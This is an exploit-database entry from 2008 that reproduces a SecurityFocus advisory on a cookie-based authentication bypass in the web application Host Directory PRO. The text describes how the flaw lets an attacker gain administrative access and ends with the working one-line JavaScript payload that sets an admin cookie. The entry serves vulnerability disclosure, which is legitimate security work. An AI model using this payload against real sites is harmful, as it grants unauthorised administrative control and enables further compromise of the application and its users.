Host Directory PRO - Cookie Security Bypass



EKU-ID: 36629 CVE: OSVDB-ID:
Author: Crackers_Child Published: 2008-04-20 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


source: https://www.securityfocus.com/bid/28863/info

Host Directory PRO is prone to a security-bypass vulnerability because it fails to properly validate user credentials before performing certain actions.

Exploiting this issue may allow an attacker to bypass certain security restrictions and gain administrative access to the application. This will compromise the application and may aid in further attacks.

javascript:document.cookie = "adm=1 path=/;";